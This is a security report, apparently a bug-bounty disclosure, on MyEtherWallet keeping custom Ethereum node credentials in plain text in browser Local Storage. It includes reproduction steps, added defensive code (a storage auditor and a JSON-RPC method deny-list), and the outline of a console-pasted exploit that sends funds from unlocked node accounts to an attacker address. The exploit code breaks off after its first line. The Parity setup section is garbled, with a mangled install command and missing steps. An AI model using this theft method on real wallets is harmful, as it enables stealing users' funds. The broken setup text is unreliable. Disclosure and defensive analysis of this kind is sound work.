
MyEtherWallet: Local Storage Custom Node Credentials Leak

## Summary

Credentials for a custom node are stored in plain text inside Local Storage on the user’s machine. If the node is configured in a certain way (accounts unlocked on the node, as described below), a local attacker could use these credentials to steal any funds in accounts attached to that node. If it is not configured this way, an attacker could still perform denial-of-service attacks against the node and violate the user’s privacy by revealing their public addresses.

## Steps To Reproduce

1. Access a wallet via MyEtherWallet (not via MetaMask, since a custom node cannot be selected in that case).
2. Add a new custom network, with a username and password:
   1. In the “Network” box, click “Change”
   2. Toggle “Add Custom Network/Node” on
   3. Enter ETH node name: test
   4. Enter URL: https://127.0.0.1
   5. Enter Port: 4000
   6. Toggle “HTTP Basic Access Authentication” on
   7. Enter User Name: user
   8. Enter Password: secretword
   9. Click Save
3. Refresh the page
4. Open Local Storage
   – In Firefox, press F12, click on Storage, then Local Storage, then https://myetherwallet.com
5. Under customNetworks you should see the User Name and Password used to connect to the node, in plain text.
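To make the check in step 5 repeatable, and to show what a non-leaking persist would look like, here is an added example (not MyEtherWallet’s code). It walks a parsed `customNetworks` value for string fields stored under credential-looking key names, and a `persistNetworks` helper that writes the same list back with those fields removed, so the secret only lives in memory for the session. The shape of the sample entry (an array of node objects with an `auth` sub-object) is a constructed assumption; the real key names may differ, and the regex should be adjusted to match them. An in-memory stand-in for `window.localStorage` is included so the snippet also runs outside a browser.

```javascript
// Added example, not MyEtherWallet code. The customNetworks layout below is a
// constructed assumption for illustration; adapt CREDENTIAL_KEY to the real key names.

// Key names that should never be persisted in plain text.
const CREDENTIAL_KEY = /^(pass(word)?|secret|user(name)?|token)$/i;

// Walk a parsed JSON value and return the dotted paths of every non-empty string
// stored under a credential-looking key.
function findPlaintextCredentials(value, path = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findPlaintextCredentials(v, `${path}[${i}]`)));
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      const p = path ? `${path}.${k}` : k;
      if (CREDENTIAL_KEY.test(k) && typeof v === "string" && v.length > 0) hits.push(p);
      hits.push(...findPlaintextCredentials(v, p));
    }
  }
  return hits;
}

// Audit one Web Storage-style object (window.localStorage or a stub) for a given key.
// Fails closed on unparseable content by reporting the parse error.
function auditStorageKey(storage, key = "customNetworks") {
  const raw = storage.getItem(key);
  if (raw === null) return { present: false, leaks: [] };
  try {
    return { present: true, leaks: findPlaintextCredentials(JSON.parse(raw)) };
  } catch (e) {
    return { present: true, leaks: [], parseError: String(e) };
  }
}

// Return a deep copy of the value with every credential-keyed field removed.
function stripCredentials(value) {
  if (Array.isArray(value)) return value.map(stripCredentials);
  if (value && typeof value === "object") {
    const out = {};
    for (const [k, v] of Object.entries(value)) {
      if (CREDENTIAL_KEY.test(k)) continue;
      out[k] = stripCredentials(v);
    }
    return out;
  }
  return value;
}

// Hardened write: the persisted config keeps name/url/port but never the secret.
function persistNetworks(storage, networks, key = "customNetworks") {
  storage.setItem(key, JSON.stringify(stripCredentials(networks)));
}

// Minimal in-memory stand-in for window.localStorage so this runs under Node as well.
function memoryStorage() {
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
  };
}

// Constructed sample mirroring the reproduction steps above.
const SAMPLE_NETWORKS = [
  { name: "test", url: "https://127.0.0.1", port: 4000,
    auth: { user: "user", password: "secretword" } },
];

// Store the sample the way the report describes, audit it, then re-persist hardened.
function demo() {
  const s = memoryStorage();
  s.setItem("customNetworks", JSON.stringify(SAMPLE_NETWORKS));
  const before = auditStorageKey(s);
  persistNetworks(s, SAMPLE_NETWORKS);
  const after = auditStorageKey(s);
  return { before, after };
}
```

In a browser console, `auditStorageKey(window.localStorage)` performs the same check as step 5 against the live page; the `before` result of `demo()` lists `[0].auth.user` and `[0].auth.password`, and the `after` result lists nothing.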

## What Could an Attacker Do With These Credentials?

These credentials can be used to access a custom node that requires authentication in order to interact with it. With them, one can make calls to the node via its JSON-RPC API. For some nodes the worst consequence would be an attacker flooding the node with API calls, a denial-of-service attack. For other node configurations, however, this could result in the theft of the user’s funds.

With both Geth and Parity nodes it is possible to add accounts to the node (i.e. Ethereum public addresses), with the password that decrypts the private key stored somewhere on the file system. The owner of the node can then unlock these accounts. In this configuration, HTTP requests to the node’s JSON-RPC interface can perform privileged actions, such as sending transactions on behalf of the unlocked accounts attached to the node, with no further authentication required while those accounts remain unlocked. Detailed steps of this process are provided below.
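The risk above comes from the node accepting account-level JSON-RPC methods from anyone who holds the HTTP basic-auth credentials. One mitigation that does not depend on the wallet is to screen requests at the HTTPS front end in front of the node. The following is an added example (not Parity, Geth or MyEtherWallet code): it parses a JSON-RPC body, single call or batch, and refuses any call to a method that can act on the node’s own accounts or enumerate them. The method names are standard Ethereum JSON-RPC and `personal` namespace names; the allow/deny split is this example’s own policy and assumes the wallet signs locally, so it only needs `eth_sendRawTransaction` rather than `eth_sendTransaction`. It fails closed on anything it cannot parse.

```javascript
// Added example, not Parity/Geth/MyEtherWallet code. Policy: a wallet that signs
// client-side never needs the node to sign or list accounts, so those methods are
// refused at the HTTPS front end even when HTTP basic auth succeeds.

const DENIED_METHODS = new Set([
  "eth_sendTransaction",   // node signs with an unlocked account
  "eth_signTransaction",
  "eth_sign",
  "eth_accounts",          // enumerates the node's own addresses
]);
const DENIED_PREFIXES = ["personal_", "admin_", "miner_"];

function isDeniedMethod(method) {
  if (typeof method !== "string") return true;
  if (DENIED_METHODS.has(method)) return true;
  return DENIED_PREFIXES.some((p) => method.startsWith(p));
}

// Screen one raw request body. A batch is refused as a whole if any member is
// privileged or malformed, so a denied call cannot hide behind allowed ones.
function screenRpcBody(body) {
  let parsed;
  try {
    parsed = JSON.parse(body);
  } catch (e) {
    return { allowed: false, reason: "unparseable JSON-RPC body" };
  }
  const calls = Array.isArray(parsed) ? parsed : [parsed];
  if (calls.length === 0) return { allowed: false, reason: "empty batch" };
  const denied = [];
  for (const c of calls) {
    if (!c || typeof c !== "object" || typeof c.method !== "string") {
      denied.push("<malformed call>");
    } else if (isDeniedMethod(c.method)) {
      denied.push(c.method);
    }
  }
  return denied.length
    ? { allowed: false, reason: "privileged or malformed call(s): " + denied.join(", ") }
    : { allowed: true, reason: "" };
}

// Constructed sample bodies; the address and tx bytes are placeholders.
const SAMPLE_BODIES = {
  balance: '{"jsonrpc":"2.0","id":1,"method":"eth_getBalance","params":["0x0000000000000000000000000000000000000000","latest"]}',
  rawTx: '{"jsonrpc":"2.0","id":2,"method":"eth_sendRawTransaction","params":["0xf86c..."]}',
  listAccounts: '{"jsonrpc":"2.0","id":3,"method":"eth_accounts","params":[]}',
  sendTx: '{"jsonrpc":"2.0","id":4,"method":"eth_sendTransaction","params":[{"from":"0x00","to":"0x00","value":"0x1"}]}',
  batch: '[{"jsonrpc":"2.0","id":5,"method":"eth_blockNumber","params":[]},{"jsonrpc":"2.0","id":6,"method":"personal_listAccounts","params":[]}]',
  garbage: "not json at all",
};

// Run every sample through the filter; returns name -> allowed.
function screenSamples() {
  const out = {};
  for (const [name, body] of Object.entries(SAMPLE_BODIES)) out[name] = screenRpcBody(body).allowed;
  return out;
}
```

In a real deployment `screenRpcBody` would run inside the HTTPS proxy mentioned below before the request is forwarded to the node, returning a JSON-RPC error to the client when `allowed` is false; the `reason` string is what to write to the proxy log so that repeated attempts to reach `eth_sendTransaction` or `personal_*` from a wallet client are visible.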

Setting up the node, using Parity:
1. Install the Parity CLI: `bash --password `
   – The jsonrpc port is non-default since I have read that there are bots that scan for unlocked accounts on the default port.
   – The jsonrpc-cors and jsonrpc-hosts options are set to all to make things easier, although in practice these might use a whitelist. However, it is likely that the local machine would pass this whitelist check if the user previously connected to the node from that computer.
   – It will take a while for the node to sync to the network if this is the first time it is being run.
4. Transfer some Ropsten ETH to the account, at least as much as the value used when sending a transaction in the exploit below (currently set to 0.001 ETH).

Note: In order to connect to this node via MyEtherWallet the connection must be over HTTPS. To do this I used a proxy server that converts incoming HTTPS requests to HTTP requests and forwards them to the Parity node. I have included instructions for this in the attached file “Setup HTTPS Proxy Using Self-signed Certificate.md”. Note: I have found that MyEtherWallet produces error messages when attempting to add a custom node with credentials; however, this does not affect this exploit.

With the Parity node set up, one can now run the exploit. The JavaScript code below assumes that the target node has been added to MyEtherWallet, and so is in “customNetworks” in Local Storage. The code iterates through all nodes in “customNetworks” that require authentication and, for each one, gets a list of addresses attached to the node. Then, for each of these addresses, it attempts to send a transaction to an attacker-controlled address. It could be adapted to find out the balance of the account and steal the entirety of the funds. This code should be copy-pasted into the JavaScript console on the target’s machine while on the MyEtherWallet home page (no wallet needs to be open):
```javascript
var networks = JSON.parse(localStorage.customNetworks);
for (let i = 0; i
```
